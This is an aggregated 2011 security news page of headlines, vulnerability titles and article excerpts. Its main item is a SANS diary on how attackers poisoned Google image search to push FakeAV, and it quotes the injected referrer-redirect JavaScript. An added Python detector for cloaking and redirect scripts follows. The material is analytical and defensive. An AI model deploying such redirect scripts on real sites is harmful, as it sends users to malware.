
InfoSec News

Isis, a mobile commerce joint venture of three major wireless carriers, has been working for months to engage Visa, MasterCard and major U.S. banks in smartphone payments with near-field communication (NFC) technology, an Isis executive clarified late on Wednesday.
Oracle Solaris CVE-2011-0820 Remote Kernel Vulnerability
Oracle's Hudson moves alienated the open source community, and those behind the fork say Oracle's latest move was also done without them
A California class action lawsuit puts Apple at the center of a conspiracy involving Google, Adobe, Intel and others to keep employee wages down.
Apple will reap more than three-fourths of all mobile app store revenues generated this year, but rival Google's growth is climbing faster, a research analyst said yesterday.
Red Hat claimed it is the only choice for openness in the cloud, as the open source vendor unveiled private cloud software and a public cloud service.
Apple said it would take a while to issue an iOS update to fix a handful of bugs related to the storage of location data, but it's taken just seven days between that announcement and the appearance of iOS 4.3.3.
China has proposed strict new data security regulations that could hamper the country's nascent IT outsourcing industry if made into law, even as they aim to give foreign business leaders confidence in the way the Chinese handle sensitive business and personal data.
Meru's new Wi-Fi gear combines a trio of powerful 802.11n radios with a battery of new software that together will let enterprises replace wired Ethernet at the network's edge, the company says.
IT officers at different federal agencies recommend giving "the nerds, the geeks, and the young people" a chance to pen test systems.


Supply Chain Security and Usama bin Laden
CSO (blog)
For several years, I have been speaking about cyber jihadist activities, most notably about Al-Qa'eda and UBL (Usama bin Laden). During these talks at various places such as SecureworldExpo, RSA, ...

AT&T announced today that the tiny HP Veer 4G smartphone will go on sale May 15 for $99.99 with a two-year contract.
Oracle has subpoenaed the Apache Software Foundation in connection with its ongoing intellectual property suit against Google, the open-source group said Wednesday.
The Amazon Web Services Management Console can now handle Identity and Access Management (IAM) features offered in its cloud.
We have received notification that Sysinternals has had some updates. One in particular that is a favorite among handlers is Process Explorer. It now includes:

Process Explorer v14.11 includes the ability to configure network and disk activity icons in the tray.

Check out the Sysinternals web site for more details @
http : //
As you can see below you now have the option of Enabling Network and Disk Activity in the system tray.

Once Enabled

You can set them to be visible in the task bar: first click Customize in your task bar options.

Then select show icons and notifications.

And there you have it, new things to stare at in your system icon tray.

Richard Porter
--- ISC Handler on Duty (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
Intel has advanced its chip manufacturing technology with three-dimensional transistors that could make PCs, smartphones and tablets faster and more power-efficient.
[security bulletin] HPSBMA02667 SSRT100464 rev.3 - HP SiteScope, Cross Site Scripting (XSS) and HTML Injection
Cisco IOS SNMP Message Processing Denial Of Service Vulnerability
Cisco IOS UDP Denial of Service Vulnerability
[RT-SA-2011-004] Client Side Authorization ZyXEL ZyWALL USG Appliances Web Interface
Mojolicious 'link_to helper' HTML Injection Vulnerability
Iomega launched a new series of desktop and rack mountable NAS devices aimed at small- to medium-sized businesses and remote offices, with a price tag for the arrays of less than $4,000.
Isis, a consortium of three major U.S. wireless carriers, has reportedly decided to back off plans to develop a separate mobile payment network and will instead work within traditional systems that rely on major credit card companies Visa and MasterCard to handle mobile transactions.
ERP (enterprise resource planning) software investments aren't on this year's agenda for three-quarters of IT decision-makers who responded to a recent Forrester Research study, indicating that the global economic downturn's effects are still lingering.
Internap on Wednesday announced plans to enter the public cloud market later this year with two offerings: one based on VMware and another using the open source KVM hypervisor.
Microsoft Windows Kernel 'Win32k.sys' (CVE-2011-1233) Local Privilege Escalation Vulnerability
sipdroid SIP INVITE Response User Enumeration Weakness
Last week marked the second OpenStack Design Summit. OpenStack, if you're not familiar with it, is an open source project founded by a joint effort and code contribution of NASA and RackSpace; however, the project has grown rapidly and has many more participants today. Among the companies participating in the OpenStack project are Cisco, Dell, NTT, Citrix, and many others.
LibreOffice, IBM Lotus Symphony, SoftMaker Office, Corel WordPerfect, and Google Docs challenge the Microsoft juggernaut
libmodplug 'load_abc.cpp' Remote Stack Based Buffer Overflow Vulnerability
Horde Security Bypass and HTML Injection Vulnerabilities
Multiple ZyWALL USG Products Remote Security Bypass Vulnerability
SAP is attempting to give its StreamWork problem-solving software a more central role within customers' IT environments by linking the applications to its core ERP applications, the vendor announced Wednesday.
Security experts are urging Microsoft and Juniper to patch a year-old IPv6 vulnerability so dangerous it can freeze any Windows machine on a LAN in a matter of minutes.
GWT 2.3 adds more HTML5 capability, while Google Plugin for Eclipse features integration with Google services
Microsoft has released the first security update for Windows Phone 7, replicating for smartphone users a patch the company gave Windows desktop users six weeks ago.
A business intelligence project at Toyota Motors challenges a growing perception that IT organizations are no longer able to keep up with the BI demands of their business units.
In addition to a variety of new features, Mac OS X 10.7 'Lion' is getting something all new: Lion Server, which will be bundled with it for free.
Brocade Technologies, which announced 16G bps Fibre Channel products on Monday, is already working on a 32G bps version and expects to have it on the market within three years.
Sothink DHTML Menu 'id' Parameter SQL Injection Vulnerability
For the last couple of weeks we have received quite a few reports of images on Google leading to (usually) FakeAV web sites.

Google is doing a relatively good job removing (or at least marking) links leading to malware in normal searches; however, Google's image search seems to be plagued with malicious links. So how do they do this?
The activities behind the scenes to poison Google's image search are actually (and unfortunately) relatively simple. The steps in a typical campaign are very similar to those I described in two previous diaries (Down the RogueAV and Blackhat SEO rabbit hole, part 1 at and part 2 at ). This is what the attackers do:

The attackers compromise a number of legitimate web sites. I have noticed that they usually attack WordPress installations, but any widely deployed software with known vulnerabilities can be exploited.

Once the source (legitimate) web sites have been exploited, the attackers plant their PHP scripts, similar to those I described in the previously mentioned diaries. These scripts vary from simple to very advanced ones that automatically monitor Google trend queries and create artificial web pages containing information that is currently of interest. That is how they generate new content: if you ever wondered how they had those web sites about Bin Laden up so quickly, it is because they automatically monitor the latest query trends and generate web pages with artificial content.

These web sites contain not only text but also images acquired from various other web sites. Again, their scripts use various search engines to locate these pictures (I will probably post a diary about this soon too). They embed links to pictures that are really related to the topic, so the automatically generated web page contains real-looking content.

Google now crawls these web sites. The scripts that the attackers planted detect Google's bots (either by their IP address or the User-Agent) and deliver special pages back containing the automatically generated content. Google will also parse the links to images and, if appropriate, populate the image search database.

Now, when a user searches for something through the Google image search function, thumbnails of pictures are displayed. Depending on the automatically generated content from step 3), the number of links to the web page and other parameters known to Google, the attackers' page will be shown at a certain position in the results page. The exploit happens when a user clicks on the thumbnail.

Google now shows a special page with the thumbnail in the center, links to the original image (no matter where it is located) on the right, and the original web site (the one that contained the image) loaded in the background. This is where the vulnerability is: Google displays that background site in a simple iframe:

<iframe scrolling="auto" id="rf" src="http://REMOVED" frameborder="0" allowtransparency="true" style="height:100%">

The user's browser will automatically send a request to the bad page, which runs the attackers' script (the one planted in step 1). This script checks the request's Referer header and, if it contains Google (meaning this was a click on a Google results page), the script returns a small JavaScript snippet:

<script>var url = "http://REMOVED/in.cgi?2&seoref=" + encodeURIComponent(document.referrer) + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" + encodeURIComponent(document.URL) + "&default_keyword=default";</script>


This causes the browser to be redirected to another site that is serving FakeAV.

As we can see, the whole story behind this is relatively simple (for the attackers). There are a number of things that can be done to protect against this attack, depending on whether we are looking at servers or clients. For a standard user, the best protection (besides not clicking on images) is to install a Mozilla Firefox add-on such as NoScript. Google could step up a bit as well, especially since this has been going on for more than a month already and there are numerous complaints on Google's forums about it. Since there are so many poisoned images, they could modify the screen that displays the results so it does not include the iframe. That only helps with the first step, though: once the user lands on the malicious web page there is really nothing Google can do.
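As an added example (not part of the diary), a Python check that a site owner or incident responder could run over captured responses from a suspect page: it flags the two behaviours described above, content that differs between Googlebot and an ordinary visitor (cloaking), and a script that builds a navigation target from document.referrer. The sample responses and the example.invalid host are constructed for the demonstration.

```python
import re
from typing import Dict, List

# Constructed sample bodies for one page fetched under three request contexts.
# These are not real captures; the host example.invalid is a placeholder.
SAMPLE_RESPONSES: Dict[str, str] = {
    "googlebot": "<html><body><h1>Trending topic</h1><p>Auto-generated text</p>"
                 "<img src='http://example.invalid/pic.jpg'></body></html>",
    "browser_no_referer": "<html><body><p>Welcome to my blog</p></body></html>",
    "browser_google_referer": "<html><body><script>var url='http://example.invalid/in.cgi?2&seoref='"
                              "+encodeURIComponent(document.referrer);window.location=url;</script>"
                              "</body></html>",
}

# Referrer-conditional redirect: script reads document.referrer and triggers navigation.
REFERRER_RE = re.compile(r"document\.referrer", re.I)
REDIRECT_RE = re.compile(r"(?:window\.|document\.)?location(?:\.href)?\s*=|location\.replace\(", re.I)
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)


def uses_referrer_redirect(html: str) -> bool:
    """True if any inline script both reads document.referrer and navigates away."""
    return any(REFERRER_RE.search(s) and REDIRECT_RE.search(s)
               for s in SCRIPT_RE.findall(html))


def is_cloaked(responses: Dict[str, str]) -> bool:
    """Cloaking: the crawler is served different content than a plain visitor."""
    return responses["googlebot"].strip() != responses["browser_no_referer"].strip()


def analyse(responses: Dict[str, str]) -> List[str]:
    """Return human-readable findings for the captured responses of one page."""
    findings: List[str] = []
    if is_cloaked(responses):
        findings.append("cloaking: crawler and browser receive different content")
    for context, body in responses.items():
        if uses_referrer_redirect(body):
            findings.append(f"referrer-driven redirect script served to {context}")
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_RESPONSES):
        print(finding)
```

A real run would capture the same URL with a crawler User-Agent, with no Referer, and with a Google Referer, then pass the bodies to analyse().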

Posted by InfoSec News on May 03

By Doug Caruso
May 2, 2011

Columbus could be placing sensitive data in danger of theft when it
retires old computers, a security expert warned.

The city's Department of Technology receives guarantees from its
computer-disposal vendor that hard drives and other data-containing
computer parts have...

Posted by InfoSec News on May 03

The Chosunilbo
May 4, 2011

A computer network breakdown on April 12 in agricultural cooperative
lender Nonghyup was the result of a cyber attack North Korea's General
Bureau of Reconnaissance prepared meticulously for more than seven
months, a spokesman for the Seoul Central District Prosecutors' Office
said Tuesday.

A North Korean source said the...

Posted by InfoSec News on May 03

Forwarded from: DeepSec Conference <deepsec (at)>

--- DeepSec 2011 "High Five" - Call for Papers

For the fifth time the DeepSec In-Depth Security Conference invites
security researchers and professionals to submit suggestions for talks
and workshops for our conference which will take place in November 2011
in Vienna.

Please visit our updated website for more details about the venue, the
schedule and information...

Posted by InfoSec News on May 03

By Robert McMillan
IDG News Service
May 3, 2011

The U.S. Federal Bureau of Investigation warned computer users Tuesday
that messages claiming to include photos and videos of Osama bin Laden's
death actually contain a virus that could steal personal information.

The warning comes as security companies said that they've spotted the

Posted by InfoSec News on May 03

By Mathew J. Schwartz
May 03, 2011

The FBI's field offices lack the skills and expertise that they require
for investigating national cybersecurity intrusions, with many field
offices facing a shortage of forensic investigators and intelligence
analysts, as well as tactical intelligence for guiding investigations.

Those are some of the top-level...

Posted by InfoSec News on May 03

Bits - The New York Times
May 3, 2011

Last week, after the Sony PlayStation Network was attacked by a group of
unknown hackers, Sony’s 77 million customers, along with security
specialists and government officials, were surprised by the amount of
information that might have been stolen from the company.

But there was another group that worried about the...
